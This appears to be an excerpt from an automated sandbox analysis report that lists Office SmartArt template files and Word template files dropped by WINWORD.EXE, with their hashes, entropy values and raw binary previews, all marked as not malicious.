                                    Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[

                                    C:\Users\user\AppData\Local\Temp\TCD9C66.tmp\BracketList.glox

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):4026
                                    Entropy (8bit):7.809492693601857
                                    Encrypted:false
                                    SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                    MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                    SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                    SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                    SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                    Malicious:false
                                    Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.

                                    C:\Users\user\AppData\Local\Temp\TCD9C66.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):250
                                    Entropy (8bit):3.4916022431157345
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXsAl8xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8A8xoGHmD0+dAH/luWvv
                                    MD5:1A314B08BB9194A41E3794EF54017811
                                    SHA1:D1E70DB69CA737101524C75E634BB72F969464FF
                                    SHA-256:9025DD691FCAD181D5FD5952C7AA3728CD8A2CAF20DEA14930876419BED9B379
                                    SHA-512:AB29C8674A85711EABAE5F9559E9048FE91A2F51EB12D5A46152A310DE59F759DF8C617DA248798A7C20F60E26FBB1B0FC8DB47C46B098BCD26CF8CE78989ACA
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.r.a.c.k.e.t.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                    C:\Users\user\AppData\Local\Temp\TCD9C87.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):246
                                    Entropy (8bit):3.5039994158393686
                                    Encrypted:false
                                    SSDEEP:6:fxnxUX4f+E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvGHmD0+dAH/luWvv
                                    MD5:16711B951E1130126E240A6E4CC2E382
                                    SHA1:8095AA79AEE029FD06428244CA2A6F28408448DB
                                    SHA-256:855342FE16234F72DA0C2765455B69CF412948CFBE70DE5F6D75A20ACDE29AE9
                                    SHA-512:454EAA0FD669489583C317699BE1CE5D706C31058B08CF2731A7621FDEFB6609C2F648E02A7A4B2B3A3DFA8406A696D1A6FA5063DDA684BDA4450A2E9FEFB0EF
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.b.e.d.A.r.c...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                    C:\Users\user\AppData\Local\Temp\TCD9C87.tmp\TabbedArc.glox

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):3683
                                    Entropy (8bit):7.772039166640107
                                    Encrypted:false
                                    SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                    MD5:E8308DA3D46D0BC30857243E1B7D330D
                                    SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                    SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                    SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                    Malicious:false
                                    Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.

                                    C:\Users\user\AppData\Local\Temp\TCD9C97.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):252
                                    Entropy (8bit):3.4680595384446202
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXivlE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyydGHmD0+dAH/luWvv
                                    MD5:D79B5DE6D93AC06005761D88783B3EE6
                                    SHA1:E05BDCE2673B6AA8CBB17A138751EDFA2264DB91
                                    SHA-256:96125D6804544B8D4E6AE8638EFD4BD1F96A1BFB9EEF57337FFF40BA9FF4CDD1
                                    SHA-512:34057F7B2AB273964CB086D8A7DF09A4E05D244A1A27E7589BDC7E5679AB5F587FAB52A2261DB22070DA11EF016F7386635A2B8E54D83730E77A7B142C2E3929
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .a.r.c.h.i.t.e.c.t.u.r.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                    C:\Users\user\AppData\Local\Temp\TCD9C97.tmp\architecture.glox

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):5783
                                    Entropy (8bit):7.88616857639663
                                    Encrypted:false
                                    SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                    MD5:8109B3C170E6C2C114164B8947F88AA1
                                    SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                    SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                    SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                    Malicious:false
                                    Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z

                                    C:\Users\user\AppData\Local\Temp\TCD9CD8.tmp\CircleProcess.glox

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):16806
                                    Entropy (8bit):7.9519793977093505
                                    Encrypted:false
                                    SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                    MD5:950F3AB11CB67CC651082FEBE523AF63
                                    SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                    SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                    SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                    Malicious:false
                                    Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..

                                    C:\Users\user\AppData\Local\Temp\TCD9CD8.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):254
                                    Entropy (8bit):3.4720677950594836
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXOu9+MlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnycMlWlzGHmD0+dAH/luWvv
                                    MD5:D04EC08EFE18D1611BDB9A5EC0CC00B1
                                    SHA1:668FF6DFE64D5306220341FC2C1353199D122932
                                    SHA-256:FA60500F951AFAF8FFDB6D1828456D60004AE1558E8E1364ADC6ECB59F5450C9
                                    SHA-512:97EBCCAF64FA33238B7CFC0A6D853EFB050D877E21EE87A78E17698F0BB38382FCE7F6C4D97D550276BD6B133D3099ECAB9CFCD739F31BFE545F4930D896EEC3
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.l.e.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                    C:\Users\user\AppData\Local\Temp\TCD9D75.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):264
                                    Entropy (8bit):3.4866056878458096
                                    Encrypted:false
                                    SSDEEP:6:fxnxUX0XrZUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXWloGHmD0+dAH/luWvv
                                    MD5:6C489D45F3B56845E68BE07EA804C698
                                    SHA1:C4C9012C0159770CB882870D4C92C307126CEC3F
                                    SHA-256:3FE447260CDCDEE287B8D01CF5F9F53738BFD6AAEC9FB9787F2826F8DEF1CA45
                                    SHA-512:D1355C48A09E7317773E4F1613C4613B7EA42D21F5A6692031D288D69D47B19E8F4D5A29AFD8B751B353FC7DE865EAE7CFE3F0BEC05F33DDF79526D64A29EB18
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                    C:\Users\user\AppData\Local\Temp\TCD9D75.tmp\ThemePictureAccent.glox

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):6448
                                    Entropy (8bit):7.897260397307811
                                    Encrypted:false
                                    SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                    MD5:42A840DC06727E42D42C352703EC72AA
                                    SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                    SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                    SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                    Malicious:false
                                    Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.

                                    C:\Users\user\AppData\Local\Temp\TCD9D86.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):262
                                    Entropy (8bit):3.4901887319218092
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXqhBMl0OoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyiMl0OoGHmD0+dAH/luWvv
                                    MD5:52BD0762F3DC77334807DDFC60D5F304
                                    SHA1:5962DA7C58F742046A116DDDA5DC8EA889C4CB0E
                                    SHA-256:30C20CC835E912A6DD89FD1BF5F7D92B233B2EC24594F1C1FE0CADB03A8C3FAB
                                    SHA-512:FB68B1CF9677A00D5651C51EC604B61DAC2D250D44A71D43CD69F41F16E4F0A7BAA7AD4A6F7BB870429297465A893013BBD7CC77A8F709AD6DB97F5A0927B1DD
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .R.a.d.i.a.l.P.i.c.t.u.r.e.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                    C:\Users\user\AppData\Local\Temp\TCD9D86.tmp\RadialPictureList.glox

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):5596
                                    Entropy (8bit):7.875182123405584
                                    Encrypted:false
                                    SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                    MD5:CDC1493350011DB9892100E94D5592FE
                                    SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                    SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                    SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                    Malicious:false
                                    Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.

                                    C:\Users\user\AppData\Local\Temp\TCD9D96.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):252
                                    Entropy (8bit):3.48087342759872
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXXt1MIae2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyfMIaRGHmD0+dAH/luWvv
                                    MD5:69757AF3677EA8D80A2FBE44DEE7B9E4
                                    SHA1:26AF5881B48F0CB81F194D1D96E3658F8763467C
                                    SHA-256:0F14CA656CDD95CAB385F9B722580DDE2F46F8622E17A63F4534072D86DF97C3
                                    SHA-512:BDA862300BAFC407D662872F0BFB5A7F2F72FE1B7341C1439A22A70098FA50C81D450144E757087778396496777410ADCE4B11B655455BEDC3D128B80CFB472A
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.i.c.t.u.r.e.F.r.a.m.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                    C:\Users\user\AppData\Local\Temp\TCD9D96.tmp\PictureFrame.glox

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):4326
                                    Entropy (8bit):7.821066198539098
                                    Encrypted:false
                                    SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                    MD5:D32E93F7782B21785424AE2BEA62B387
                                    SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                    SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                    SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                    Malicious:false
                                    Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v

                                    C:\Users\user\AppData\Local\Temp\TCD9D97.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):374
                                    Entropy (8bit):3.5414485333689694
                                    Encrypted:false
                                    SSDEEP:6:fxnxUX8FaE3f8AWqlQqr++lcWimqnKOE3QepmlJ0+3FbnKfZObdADryMluxHZypo:fxnyj9AWI+acgq9GHmD0wbnKYZAH/lMf
                                    MD5:2F7A8FE4E5046175500AFFA228F99576
                                    SHA1:8A3DE74981D7917E6CE1198A3C8E35C7E2100F43
                                    SHA-256:1495B4EC56B371148EA195D790562E5621FDBF163CDD8A5F3C119F8CA3BD2363
                                    SHA-512:4B8FBB692D91D88B584E46C2F01BDE0C05DCD5D2FF073D83331586FB3D201EACD777D48DB3751E534E22115AA1C3C30392D0D642B3122F21EF10E3EE6EA3BE82
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.e.x.t. .S.i.d.e.b.a.r. .(.A.n.n.u.a.l. .R.e.p.o.r.t. .R.e.d. .a.n.d. .B.l.a.c.k. .d.e.s.i.g.n.)...d.o.c.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                    C:\Users\user\AppData\Local\Temp\TCD9D97.tmp\Text Sidebar (Annual Report Red and Black design).docx

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Word 2007+
                                    Category:dropped
                                    Size (bytes):47296
                                    Entropy (8bit):6.42327948041841
                                    Encrypted:false
                                    SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                                    MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                    SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                    SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                    SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                    Malicious:false
                                    Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..

                                    C:\Users\user\AppData\Local\Temp\TCD9D98.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):290
                                    Entropy (8bit):3.5081874837369886
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXCOzi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnydONGHmD0wbnKYZAH/lMZqiv
                                    MD5:8D9B02CC69FA40564E6C781A9CC9E626
                                    SHA1:352469A1ABB8DA1DC550D7E27924E552B0D39204
                                    SHA-256:1D4483830710EF4A2CC173C3514A9F4B0ACA6C44DB22729B7BE074D18C625BAE
                                    SHA-512:8B7DB2AB339DD8085104855F847C48970C2DD32ADB0B8EEA134A64C5CC7DE772615F85D057F4357703B65166C8CF0C06F4F6FD3E60FFC80DA3DD34B16D5B1281
                                    Malicious:false
